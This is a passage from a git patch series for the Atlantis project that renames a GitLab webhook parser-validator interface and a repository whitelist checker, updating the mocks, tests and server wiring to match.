+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_gitlab_request_parser_validator.go GitlabRequestParserValidator
 
-// GitlabRequestParser parses and validates GitLab requests.
-type GitlabRequestParser interface {
-	// Validate validates that the request has a token header matching secret.
+// GitlabRequestParserValidator parses and validates GitLab requests.
+type GitlabRequestParserValidator interface {
+	// ParseAndValidate validates that the request has a token header matching secret.
 	// If the secret does not match it returns an error.
 	// If secret is empty it does not check the token header.
 	// It then parses the request as a GitLab object depending on the header
 	// provided by GitLab identifying the webhook type. If the webhook type
 	// is not recognized it will return nil but will not return an error.
 	// Usage:
-	//	event, err := GitlabRequestParser.Validate(r, secret)
+	//	event, err := GitlabRequestParserValidator.ParseAndValidate(r, secret)
 	//	if err != nil {
 	//		return
 	//	}
@@ -47,15 +47,15 @@ type GitlabRequestParser interface {
 	//	default:
 	//		// unsupported event
 	//	}
-	Validate(r *http.Request, secret []byte) (interface{}, error)
+	ParseAndValidate(r *http.Request, secret []byte) (interface{}, error)
 }
 
-// DefaultGitlabRequestParser parses and validates GitLab requests.
-type DefaultGitlabRequestParser struct{}
+// DefaultGitlabRequestParserValidator parses and validates GitLab requests.
+type DefaultGitlabRequestParserValidator struct{}
 
-// Validate returns the JSON payload of the request.
-// See GitlabRequestParser.Validate()
-func (d *DefaultGitlabRequestParser) Validate(r *http.Request, secret []byte) (interface{}, error) {
+// ParseAndValidate returns the JSON payload of the request.
+// See GitlabRequestParserValidator.ParseAndValidate().
+func (d *DefaultGitlabRequestParserValidator) ParseAndValidate(r *http.Request, secret []byte) (interface{}, error) {
 	const mergeEventHeader = "Merge Request Hook"
 	const noteEventHeader = "Note Hook"
 
diff --git a/server/gitlab_request_parser_test.go b/server/gitlab_request_parser_validator_test.go
similarity index 96%
rename from server/gitlab_request_parser_test.go
rename to server/gitlab_request_parser_validator_test.go
index 385d718795..eacbc1d4a2 100644
--- a/server/gitlab_request_parser_test.go
+++ b/server/gitlab_request_parser_validator_test.go
@@ -24,7 +24,7 @@ import (
 	. "github.com/runatlantis/atlantis/testing"
 )
 
-var parser = server.DefaultGitlabRequestParser{}
+var parser = server.DefaultGitlabRequestParserValidator{}
 
 func TestValidate_InvalidSecret(t *testing.T) {
 	t.Log("If the secret header is set and doesn't match expected an error is returned")
@@ -33,7 +33,7 @@ func TestValidate_InvalidSecret(t *testing.T) {
 	req, err := http.NewRequest("POST", "http://localhost/event", buf)
 	Ok(t, err)
 	req.Header.Set("X-Gitlab-Token", "does-not-match")
-	_, err = parser.Validate(req, []byte("secret"))
+	_, err = parser.ParseAndValidate(req, []byte("secret"))
 	Assert(t, err != nil, "should be an error")
 	Equals(t, "header X-Gitlab-Token=does-not-match did not match expected secret", err.Error())
 }
@@ -46,7 +46,7 @@ func TestValidate_ValidSecret(t *testing.T) {
 	Ok(t, err)
 	req.Header.Set("X-Gitlab-Token", "secret")
 	req.Header.Set("X-Gitlab-Event", "Merge Request Hook")
-	b, err := parser.Validate(req, []byte("secret"))
+	b, err := parser.ParseAndValidate(req, []byte("secret"))
 	Ok(t, err)
 	Equals(t, "Gitlab Test", b.(gitlab.MergeEvent).Project.Name)
 }
@@ -59,7 +59,7 @@ func TestValidate_NoSecret(t *testing.T) {
 	Ok(t, err)
 	req.Header.Set("X-Gitlab-Token", "random secret")
 	req.Header.Set("X-Gitlab-Event", "Merge Request Hook")
-	b, err := parser.Validate(req, nil)
+	b, err := parser.ParseAndValidate(req, nil)
 	Ok(t, err)
 	Equals(t, "Gitlab Test", b.(gitlab.MergeEvent).Project.Name)
 }
@@ -71,7 +71,7 @@ func TestValidate_InvalidMergeEvent(t *testing.T) {
 	req, err := http.NewRequest("POST", "http://localhost/event", buf)
 	Ok(t, err)
 	req.Header.Set("X-Gitlab-Event", "Merge Request Hook")
-	_, err = parser.Validate(req, nil)
+	_, err = parser.ParseAndValidate(req, nil)
 	Assert(t, err != nil, "should be an error")
 	Equals(t, "unexpected end of JSON input", err.Error())
 }
@@ -83,7 +83,7 @@ func TestValidate_InvalidMergeCommentEvent(t *testing.T) {
 	req, err := http.NewRequest("POST", "http://localhost/event", buf)
 	Ok(t, err)
 	req.Header.Set("X-Gitlab-Event", "Note Hook")
-	_, err = parser.Validate(req, nil)
+	_, err = parser.ParseAndValidate(req, nil)
 	Assert(t, err != nil, "should be an error")
 	Equals(t, "unexpected end of JSON input", err.Error())
 }
@@ -95,7 +95,7 @@ func TestValidate_UnrecognizedEvent(t *testing.T) {
 	req, err := http.NewRequest("POST", "http://localhost/event", buf)
 	Ok(t, err)
 	req.Header.Set("X-Gitlab-Event", "Random Event")
-	event, err := parser.Validate(req, nil)
+	event, err := parser.ParseAndValidate(req, nil)
 	Ok(t, err)
 	Equals(t, nil, event)
 }
@@ -107,7 +107,7 @@ func TestValidate_ValidMergeEvent(t *testing.T) {
 	req, err := http.NewRequest("POST", "http://localhost/event", buf)
 	Ok(t, err)
 	req.Header.Set("X-Gitlab-Event", "Merge Request Hook")
-	b, err := parser.Validate(req, nil)
+	b, err := parser.ParseAndValidate(req, nil)
 	Ok(t, err)
 	Equals(t, "Gitlab Test", b.(gitlab.MergeEvent).Project.Name)
 	RegisterMockTestingT(t)
@@ -120,7 +120,7 @@ func TestValidate_ValidMergeCommentEvent(t *testing.T) {
 	req, err := http.NewRequest("POST", "http://localhost/event", buf)
 	Ok(t, err)
 	req.Header.Set("X-Gitlab-Event", "Note Hook")
-	b, err := parser.Validate(req, nil)
+	b, err := parser.ParseAndValidate(req, nil)
 	Ok(t, err)
 	Equals(t, "Gitlab Test", b.(gitlab.MergeCommentEvent).Project.Name)
 	RegisterMockTestingT(t)
diff --git a/server/mocks/mock_gitlab_request_parser.go b/server/mocks/mock_gitlab_request_parser.go
deleted file mode 100644
index e4598a1fe1..0000000000
--- a/server/mocks/mock_gitlab_request_parser.go
+++ /dev/null
@@ -1,84 +0,0 @@
-// Automatically generated by pegomock. DO NOT EDIT!
-// Source: github.com/runatlantis/atlantis/server (interfaces: GitlabRequestParser)
-
-package mocks
-
-import (
-	http "net/http"
-	"reflect"
-
-	pegomock "github.com/petergtz/pegomock"
-)
-
-type MockGitlabRequestParser struct {
-	fail func(message string, callerSkip ...int)
-}
-
-func NewMockGitlabRequestParser() *MockGitlabRequestParser {
-	return &MockGitlabRequestParser{fail: pegomock.GlobalFailHandler}
-}
-
-func (mock *MockGitlabRequestParser) Validate(r *http.Request, secret []byte) (interface{}, error) {
-	params := []pegomock.Param{r, secret}
-	result := pegomock.GetGenericMockFrom(mock).Invoke("Validate", params, []reflect.Type{reflect.TypeOf((*interface{})(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
-	var ret0 interface{}
-	var ret1 error
-	if len(result) != 0 {
-		if result[0] != nil {
-			ret0 = result[0].(interface{})
-		}
-		if result[1] != nil {
-			ret1 = result[1].(error)
-		}
-	}
-	return ret0, ret1
-}
-
-func (mock *MockGitlabRequestParser) VerifyWasCalledOnce() *VerifierGitlabRequestParser {
-	return &VerifierGitlabRequestParser{mock, pegomock.Times(1), nil}
-}
-
-func (mock *MockGitlabRequestParser) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierGitlabRequestParser {
-	return &VerifierGitlabRequestParser{mock, invocationCountMatcher, nil}
-}
-
-func (mock *MockGitlabRequestParser) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierGitlabRequestParser {
-	return &VerifierGitlabRequestParser{mock, invocationCountMatcher, inOrderContext}
-}
-
-type VerifierGitlabRequestParser struct {
-	mock                   *MockGitlabRequestParser
-	invocationCountMatcher pegomock.Matcher
-	inOrderContext         *pegomock.InOrderContext
-}
-
-func (verifier *VerifierGitlabRequestParser) Validate(r *http.Request, secret []byte) *GitlabRequestParser_Validate_OngoingVerification {
-	params := []pegomock.Param{r, secret}
-	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Validate", params)
-	return &GitlabRequestParser_Validate_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
-}
-
-type GitlabRequestParser_Validate_OngoingVerification struct {
-	mock              *MockGitlabRequestParser
-	methodInvocations []pegomock.MethodInvocation
-}
-
-func (c *GitlabRequestParser_Validate_OngoingVerification) GetCapturedArguments() (*http.Request, []byte) {
-	r, secret := c.GetAllCapturedArguments()
-	return r[len(r)-1], secret[len(secret)-1]
-}
-
-func (c *GitlabRequestParser_Validate_OngoingVerification) GetAllCapturedArguments() (_param0 []*http.Request, _param1 [][]byte) {
-	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
-	if len(params) > 0 {
-		_param0 = make([]*http.Request, len(params[0]))
-		for u, param := range params[0] {
-			_param0[u] = param.(*http.Request)
-		}
-		_param1 = make([][]byte, len(params[1]))
-		for u, param := range params[1] {
-			_param1[u] = param.([]byte)
-		}
-	}
-	return
-}
diff --git a/server/mocks/mock_gitlab_request_parser_validator.go b/server/mocks/mock_gitlab_request_parser_validator.go
new file mode 100644
index 0000000000..c23738294a
--- /dev/null
+++ b/server/mocks/mock_gitlab_request_parser_validator.go
@@ -0,0 +1,84 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server (interfaces: GitlabRequestParserValidator)
+
+package mocks
+
+import (
+	http "net/http"
+	"reflect"
+
+	pegomock "github.com/petergtz/pegomock"
+)
+
+type MockGitlabRequestParserValidator struct {
+	fail func(message string, callerSkip ...int)
+}
+
+func NewMockGitlabRequestParserValidator() *MockGitlabRequestParserValidator {
+	return &MockGitlabRequestParserValidator{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockGitlabRequestParserValidator) ParseAndValidate(r *http.Request, secret []byte) (interface{}, error) {
+	params := []pegomock.Param{r, secret}
+	result := pegomock.GetGenericMockFrom(mock).Invoke("ParseAndValidate", params, []reflect.Type{reflect.TypeOf((*interface{})(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+	var ret0 interface{}
+	var ret1 error
+	if len(result) != 0 {
+		if result[0] != nil {
+			ret0 = result[0].(interface{})
+		}
+		if result[1] != nil {
+			ret1 = result[1].(error)
+		}
+	}
+	return ret0, ret1
+}
+
+func (mock *MockGitlabRequestParserValidator) VerifyWasCalledOnce() *VerifierGitlabRequestParserValidator {
+	return &VerifierGitlabRequestParserValidator{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockGitlabRequestParserValidator) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierGitlabRequestParserValidator {
+	return &VerifierGitlabRequestParserValidator{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockGitlabRequestParserValidator) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierGitlabRequestParserValidator {
+	return &VerifierGitlabRequestParserValidator{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierGitlabRequestParserValidator struct {
+	mock                   *MockGitlabRequestParserValidator
+	invocationCountMatcher pegomock.Matcher
+	inOrderContext         *pegomock.InOrderContext
+}
+
+func (verifier *VerifierGitlabRequestParserValidator) ParseAndValidate(r *http.Request, secret []byte) *GitlabRequestParserValidator_ParseAndValidate_OngoingVerification {
+	params := []pegomock.Param{r, secret}
+	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ParseAndValidate", params)
+	return &GitlabRequestParserValidator_ParseAndValidate_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type GitlabRequestParserValidator_ParseAndValidate_OngoingVerification struct {
+	mock              *MockGitlabRequestParserValidator
+	methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *GitlabRequestParserValidator_ParseAndValidate_OngoingVerification) GetCapturedArguments() (*http.Request, []byte) {
+	r, secret := c.GetAllCapturedArguments()
+	return r[len(r)-1], secret[len(secret)-1]
+}
+
+func (c *GitlabRequestParserValidator_ParseAndValidate_OngoingVerification) GetAllCapturedArguments() (_param0 []*http.Request, _param1 [][]byte) {
+	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+	if len(params) > 0 {
+		_param0 = make([]*http.Request, len(params[0]))
+		for u, param := range params[0] {
+			_param0[u] = param.(*http.Request)
+		}
+		_param1 = make([][]byte, len(params[1]))
+		for u, param := range params[1] {
+			_param1[u] = param.([]byte)
+		}
+	}
+	return
+}
diff --git a/server/server.go b/server/server.go
index 734a36de4d..63bd77a83f 100644
--- a/server/server.go
+++ b/server/server.go
@@ -273,20 +273,20 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 		LockDetailTemplate: lockTemplate,
 	}
 	eventsController := &EventsController{
-		CommandRunner:          commandHandler,
-		PullCleaner:            pullClosedExecutor,
-		Parser:                 eventParser,
-		CommentParser:          commentParser,
-		Logger:                 logger,
-		GithubWebHookSecret:    []byte(userConfig.GithubWebHookSecret),
-		GithubRequestValidator: &DefaultGithubRequestValidator{},
-		GitlabRequestParser:    &DefaultGitlabRequestParser{},
-		GitlabWebHookSecret:    []byte(userConfig.GitlabWebHookSecret),
-		RepoWhitelist:          repoWhitelist,
-		SupportedVCSHosts:      supportedVCSHosts,
-		VCSClient:              vcsClient,
-		AtlantisGithubUser:     models.User{Username: userConfig.GithubUser},
-		AtlantisGitlabUser:     models.User{Username: userConfig.GitlabUser},
+		CommandRunner:                commandHandler,
+		PullCleaner:                  pullClosedExecutor,
+		Parser:                       eventParser,
+		CommentParser:                commentParser,
+		Logger:                       logger,
+		GithubWebHookSecret:          []byte(userConfig.GithubWebHookSecret),
+		GithubRequestValidator:       &DefaultGithubRequestValidator{},
+		GitlabRequestParserValidator: &DefaultGitlabRequestParserValidator{},
+		GitlabWebHookSecret:          []byte(userConfig.GitlabWebHookSecret),
+		RepoWhitelist:                repoWhitelist,
+		SupportedVCSHosts:            supportedVCSHosts,
+		VCSClient:                    vcsClient,
+		AtlantisGithubUser:           models.User{Username: userConfig.GithubUser},
+		AtlantisGitlabUser:           models.User{Username: userConfig.GitlabUser},
 	}
 	return &Server{
 		AtlantisVersion:    config.AtlantisVersion,

From d359131a29eec90e588eef6d5d9f4d4cc6c36218 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Wed, 20 Jun 2018 15:20:10 +0100
Subject: [PATCH 39/69] RepoWhitelist -> RepoWhitelistChecker

---
 ...repo_whitelist.go => repo_whitelist_checker.go} |  8 ++++----
 ...list_test.go => repo_whitelist_checker_test.go} |  4 ++--
 server/events_controller.go                        |  8 ++++----
 server/events_controller_e2e_test.go               |  2 +-
 server/events_controller_test.go                   | 14 +++++++-------
 server/router.go                                   |  2 +-
 server/server.go                                   |  4 ++--
 7 files changed, 21 insertions(+), 21 deletions(-)
 rename server/events/{repo_whitelist.go => repo_whitelist_checker.go} (86%)
 rename server/events/{repo_whitelist_test.go => repo_whitelist_checker_test.go} (96%)

diff --git a/server/events/repo_whitelist.go b/server/events/repo_whitelist_checker.go
similarity index 86%
rename from server/events/repo_whitelist.go
rename to server/events/repo_whitelist_checker.go
index 06c500f48b..0e45401332 100644
--- a/server/events/repo_whitelist.go
+++ b/server/events/repo_whitelist_checker.go
@@ -21,16 +21,16 @@ import (
 // Wildcard matches 0-n of all characters except commas.
 const Wildcard = "*"
 
-// RepoWhitelist implements checking if repos are whitelisted to be used with
+// RepoWhitelistChecker implements checking if repos are whitelisted to be used with
 // this Atlantis.
-type RepoWhitelist struct {
+type RepoWhitelistChecker struct {
 	// Whitelist is a comma separated list of rules with wildcards '*' allowed.
 	Whitelist string
 }
 
 // IsWhitelisted returns true if this repo is in our whitelist and false
 // otherwise.
-func (r *RepoWhitelist) IsWhitelisted(repoFullName string, vcsHostname string) bool {
+func (r *RepoWhitelistChecker) IsWhitelisted(repoFullName string, vcsHostname string) bool {
 	candidate := fmt.Sprintf("%s/%s", vcsHostname, repoFullName)
 	rules := strings.Split(r.Whitelist, ",")
 	for _, rule := range rules {
@@ -41,7 +41,7 @@ func (r *RepoWhitelist) IsWhitelisted(repoFullName string, vcsHostname string) b
 	return false
 }
 
-func (r *RepoWhitelist) matchesRule(rule string, candidate string) bool {
+func (r *RepoWhitelistChecker) matchesRule(rule string, candidate string) bool {
 	// Case insensitive compare.
 	rule = strings.ToLower(rule)
 	candidate = strings.ToLower(candidate)
diff --git a/server/events/repo_whitelist_test.go b/server/events/repo_whitelist_checker_test.go
similarity index 96%
rename from server/events/repo_whitelist_test.go
rename to server/events/repo_whitelist_checker_test.go
index 21e3585725..d6f3f07e11 100644
--- a/server/events/repo_whitelist_test.go
+++ b/server/events/repo_whitelist_checker_test.go
@@ -20,7 +20,7 @@ import (
 	. "github.com/runatlantis/atlantis/testing"
 )
 
-func TestIsWhitelisted(t *testing.T) {
+func TestRepoWhitelistChecker_IsWhitelisted(t *testing.T) {
 	cases := []struct {
 		Description  string
 		Whitelist    string
@@ -151,7 +151,7 @@ func TestIsWhitelisted(t *testing.T) {
 
 	for _, c := range cases {
 		t.Run(c.Description, func(t *testing.T) {
-			w := events.RepoWhitelist{Whitelist: c.Whitelist}
+			w := events.RepoWhitelistChecker{Whitelist: c.Whitelist}
 			Equals(t, c.Exp, w.IsWhitelisted(c.RepoFullName, c.Hostname))
 		})
 	}
diff --git a/server/events_controller.go b/server/events_controller.go
index 95faa70299..3db62bd96e 100644
--- a/server/events_controller.go
+++ b/server/events_controller.go
@@ -45,8 +45,8 @@ type EventsController struct {
 	// GitlabWebHookSecret is the secret added to this webhook via the GitLab
 	// UI that identifies this call as coming from GitLab. If empty, no
 	// request validation is done.
-	GitlabWebHookSecret []byte
-	RepoWhitelist       *events.RepoWhitelist
+	GitlabWebHookSecret  []byte
+	RepoWhitelistChecker *events.RepoWhitelistChecker
 	// SupportedVCSHosts is which VCS hosts Atlantis was configured upon
 	// startup to support.
 	SupportedVCSHosts []models.VCSHostType
@@ -159,7 +159,7 @@ const ClosedPullEvent = "closed"
 const OtherPullEvent = "other"
 
 func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User, eventType string) {
-	if !e.RepoWhitelist.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) {
+	if !e.RepoWhitelistChecker.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) {
 		// If the repo isn't whitelisted and we receive an opened pull request
 		// event we comment back on the pull request that the repo isn't
 		// whitelisted. This is because the user might be expecting Atlantis to
@@ -254,7 +254,7 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo
 
 	// At this point we know it's a command we're not supposed to ignore, so now
 	// we check if this repo is allowed to run commands in the first place.
-	if !e.RepoWhitelist.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) {
+	if !e.RepoWhitelistChecker.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) {
 		e.commentNotWhitelisted(baseRepo, pullNum)
 		e.respond(w, logging.Warn, http.StatusForbidden, "Repo not whitelisted")
 		return
diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go
index f1dc0958fa..7d9f300a72 100644
--- a/server/events_controller_e2e_test.go
+++ b/server/events_controller_e2e_test.go
@@ -293,7 +293,7 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy,
 		GithubRequestValidator:       &server.DefaultGithubRequestValidator{},
 		GitlabRequestParserValidator: &server.DefaultGitlabRequestParserValidator{},
 		GitlabWebHookSecret:          nil,
-		RepoWhitelist: &events.RepoWhitelist{
+		RepoWhitelistChecker: &events.RepoWhitelistChecker{
 			Whitelist: "*",
 		},
 		SupportedVCSHosts: []models.VCSHostType{models.Gitlab, models.Github},
diff --git a/server/events_controller_test.go b/server/events_controller_test.go
index 9d35a22655..a7f5c81a69 100644
--- a/server/events_controller_test.go
+++ b/server/events_controller_test.go
@@ -177,10 +177,10 @@ func TestPost_GitlabCommentNotWhitelisted(t *testing.T) {
 		Logger:                       logging.NewNoopLogger(),
 		CommentParser:                &events.CommentParser{},
 		GitlabRequestParserValidator: &server.DefaultGitlabRequestParserValidator{},
-		Parser:            &events.EventParser{},
-		SupportedVCSHosts: []models.VCSHostType{models.Gitlab},
-		RepoWhitelist:     &events.RepoWhitelist{},
-		VCSClient:         vcsClient,
+		Parser:               &events.EventParser{},
+		SupportedVCSHosts:    []models.VCSHostType{models.Gitlab},
+		RepoWhitelistChecker: &events.RepoWhitelistChecker{},
+		VCSClient:            vcsClient,
 	}
 	requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "gitlabMergeCommentEvent_notWhitelisted.json"))
 	Ok(t, err)
@@ -207,7 +207,7 @@ func TestPost_GithubCommentNotWhitelisted(t *testing.T) {
 		CommentParser:          &events.CommentParser{},
 		Parser:                 &events.EventParser{},
 		SupportedVCSHosts:      []models.VCSHostType{models.Github},
-		RepoWhitelist:          &events.RepoWhitelist{},
+		RepoWhitelistChecker:   &events.RepoWhitelistChecker{},
 		VCSClient:              vcsClient,
 	}
 	requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "githubIssueCommentEvent_notWhitelisted.json"))
@@ -325,7 +325,7 @@ func TestPost_GithubPullRequestInvalidRepo(t *testing.T) {
 func TestPost_GithubPullRequestNotWhitelisted(t *testing.T) {
 	t.Log("when the event is a github pull request to a non-whitelisted repo we return a 400")
 	e, v, _, p, _, _, _, _ := setup(t)
-	e.RepoWhitelist = &events.RepoWhitelist{Whitelist: "github.com/nevermatch"}
+	e.RepoWhitelistChecker = &events.RepoWhitelistChecker{Whitelist: "github.com/nevermatch"}
 	req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
 	req.Header.Set(githubHeader, "pull_request")
 
@@ -424,7 +424,7 @@ func setup(t *testing.T) (server.EventsController, *mocks.MockGithubRequestValid
 		SupportedVCSHosts:            []models.VCSHostType{models.Github, models.Gitlab},
 		GitlabWebHookSecret:          secret,
 		GitlabRequestParserValidator: gl,
-		RepoWhitelist: &events.RepoWhitelist{
+		RepoWhitelistChecker: &events.RepoWhitelistChecker{
 			Whitelist: "*",
 		},
 		VCSClient: vcsmock,
diff --git a/server/router.go b/server/router.go
index af9319b987..4f4e2840da 100644
--- a/server/router.go
+++ b/server/router.go
@@ -9,7 +9,7 @@ import (
 
 // Router can be used to retrieve Atlantis URLs. It acts as an intermediary
 // between the underlying router and the rest of Atlantis that might need to
-// know URLs to different resources.
+// construct URLs to different resources.
 type Router struct {
 	// Underlying is the router that the routes have been constructed on.
 	Underlying *mux.Router
diff --git a/server/server.go b/server/server.go
index 63bd77a83f..fe97620d53 100644
--- a/server/server.go
+++ b/server/server.go
@@ -262,7 +262,7 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 			},
 		},
 	}
-	repoWhitelist := &events.RepoWhitelist{
+	repoWhitelist := &events.RepoWhitelistChecker{
 		Whitelist: userConfig.RepoWhitelist,
 	}
 	locksController := &LocksController{
@@ -282,7 +282,7 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 		GithubRequestValidator:       &DefaultGithubRequestValidator{},
 		GitlabRequestParserValidator: &DefaultGitlabRequestParserValidator{},
 		GitlabWebHookSecret:          []byte(userConfig.GitlabWebHookSecret),
-		RepoWhitelist:                repoWhitelist,
+		RepoWhitelistChecker:         repoWhitelist,
 		SupportedVCSHosts:            supportedVCSHosts,
 		VCSClient:                    vcsClient,
 		AtlantisGithubUser:           models.User{Username: userConfig.GithubUser},

From d3ec832effdff19a9d83df2c4ab07a20a9f8040c Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Thu, 21 Jun 2018 18:18:54 +0100
Subject: [PATCH 40/69] WIP

---
 server/events/atlantis_workspace.go           |   1 +
 server/events/atlantis_workspace_locker.go    |  13 +
 server/events/command_context.go              |   5 +-
 server/events/command_handler_test.go         | 247 ------------------
 ...{command_response.go => command_result.go} |   4 +-
 .../{command_handler.go => command_runner.go} | 155 +++++++----
 server/events/command_runner_test.go          | 239 +++++++++++++++++
 server/events/comment_parser.go               |   4 +-
 server/events/commit_status_updater.go        |  12 +-
 server/events/commit_status_updater_test.go   |  66 ++---
 server/events/event_parser.go                 | 121 ++++++---
 server/events/event_parser_test.go            | 159 +++++++++--
 server/events/executor.go                     |   2 +-
 server/events/markdown_renderer.go            |   6 +-
 server/events/markdown_renderer_test.go       | 175 ++++++++-----
 ...mmandresponse.go => events_commandname.go} |  10 +-
 .../mocks/matchers/events_commandresult.go    |  20 ++
 .../matchers/models_projectcommandcontext.go  |  20 ++
 .../mocks/matchers/ptr_to_events_command.go   |  10 +-
 .../matchers/ptr_to_events_commentcommand.go  |  20 ++
 .../ptr_to_github_pullrequestevent.go         |  20 ++
 .../mocks/matchers/ptr_to_models_repo.go      |  20 ++
 .../slice_of_models_projectcommandcontext.go  |  20 ++
 server/events/mocks/mock_command_runner.go    |  76 ++++--
 .../mocks/mock_commit_status_updater.go       |  44 ++--
 server/events/mocks/mock_event_parsing.go     |  83 +++++-
 server/events/mocks/mock_executor.go          |   8 +-
 .../mocks/mock_project_command_builder.go     | 175 +++++++++++++
 .../mocks/mock_pull_request_operator.go       | 154 -----------
 server/events/models/models_test.go           |   7 +
 ...operator.go => project_command_builder.go} | 148 +++++------
 ...est.go => project_command_builder_test.go} |   0
 ..._operator.go => project_command_runner.go} | 104 +++++---
 ...test.go => project_command_runner_test.go} |   0
 server/events/project_result.go               |   8 +-
 ..._step_operator.go => apply_step_runner.go} |   6 +-
 ...ator_test.go => apply_step_runner_test.go} |   8 +-
 ...t_step_operator.go => init_step_runner.go} |   4 +-
 ...rator_test.go => init_step_runner_test.go} |   2 +-
 ...n_step_operater.go => plan_step_runner.go} |   6 +-
 ...rater_test.go => plan_step_runner_test.go} |  40 ++-
 ...l_operator.go => pull_approved_checker.go} |   4 +-
 .../events/runtime/run_step_operator_test.go  |   3 -
 ...un_step_operator.go => run_step_runner.go} |   6 +-
 server/events/runtime/run_step_runner_test.go |  50 ++++
 server/events/vcs/fixtures/fixtures.go        |   8 +
 server/events/vcs/vcs_test.go                 |  19 ++
 server/events_controller.go                   |  50 ++--
 server/events_controller_e2e_test.go          |  78 +++---
 server/events_controller_test.go              | 159 ++++++++---
 server/router_test.go                         |  27 ++
 server/server.go                              |  69 +++--
 server/server_test.go                         |   1 +
 .../githubPullRequestClosedEvent.json         |  32 +--
 .../githubPullRequestOpenedEvent.json         |   6 +-
 .../exp-output-apply-default.txt.act          |   7 -
 .../tfvars-yaml/exp-output-autoplan.txt.act   |  61 -----
 57 files changed, 1727 insertions(+), 1075 deletions(-)
 delete mode 100644 server/events/command_handler_test.go
 rename server/events/{command_response.go => command_result.go} (89%)
 rename server/events/{command_handler.go => command_runner.go} (58%)
 create mode 100644 server/events/command_runner_test.go
 rename server/events/mocks/matchers/{events_commandresponse.go => events_commandname.go} (53%)
 create mode 100644 server/events/mocks/matchers/events_commandresult.go
 create mode 100644 server/events/mocks/matchers/models_projectcommandcontext.go
 create mode 100644 server/events/mocks/matchers/ptr_to_events_commentcommand.go
 create mode 100644 server/events/mocks/matchers/ptr_to_github_pullrequestevent.go
 create mode 100644 server/events/mocks/matchers/ptr_to_models_repo.go
 create mode 100644 server/events/mocks/matchers/slice_of_models_projectcommandcontext.go
 create mode 100644 server/events/mocks/mock_project_command_builder.go
 delete mode 100644 server/events/mocks/mock_pull_request_operator.go
 rename server/events/{pull_request_operator.go => project_command_builder.go} (62%)
 rename server/events/{pull_request_operator_test.go => project_command_builder_test.go} (100%)
 rename server/events/{project_operator.go => project_command_runner.go} (57%)
 rename server/events/{project_operator_test.go => project_command_runner_test.go} (100%)
 rename server/events/runtime/{apply_step_operator.go => apply_step_runner.go} (83%)
 rename server/events/runtime/{apply_step_operator_test.go => apply_step_runner_test.go} (95%)
 rename server/events/runtime/{init_step_operator.go => init_step_runner.go} (87%)
 rename server/events/runtime/{init_step_operator_test.go => init_step_runner_test.go} (97%)
 rename server/events/runtime/{plan_step_operater.go => plan_step_runner.go} (93%)
 rename server/events/runtime/{plan_step_operater_test.go => plan_step_runner_test.go} (87%)
 rename server/events/runtime/{approval_operator.go => pull_approved_checker.go} (67%)
 delete mode 100644 server/events/runtime/run_step_operator_test.go
 rename server/events/runtime/{run_step_operator.go => run_step_runner.go} (77%)
 create mode 100644 server/events/runtime/run_step_runner_test.go
 create mode 100644 server/events/vcs/vcs_test.go
 create mode 100644 server/router_test.go
 delete mode 100644 server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt.act
 delete mode 100644 server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt.act

diff --git a/server/events/atlantis_workspace.go b/server/events/atlantis_workspace.go
index 06944bdae7..251adb7e34 100644
--- a/server/events/atlantis_workspace.go
+++ b/server/events/atlantis_workspace.go
@@ -35,6 +35,7 @@ type AtlantisWorkspace interface {
 	// absolute path to the root of the cloned repo.
 	Clone(log *logging.SimpleLogger, baseRepo models.Repo, headRepo models.Repo, p models.PullRequest, workspace string) (string, error)
 	// GetWorkspace returns the path to the workspace for this repo and pull.
+	// If workspace does not exist on disk, error will be of type os.IsNotExist.
 	GetWorkspace(r models.Repo, p models.PullRequest, workspace string) (string, error)
 	// Delete deletes the workspace for this repo and pull.
 	Delete(r models.Repo, p models.PullRequest) error
diff --git a/server/events/atlantis_workspace_locker.go b/server/events/atlantis_workspace_locker.go
index 594ea08ab6..cc86db42c7 100644
--- a/server/events/atlantis_workspace_locker.go
+++ b/server/events/atlantis_workspace_locker.go
@@ -30,6 +30,8 @@ import (
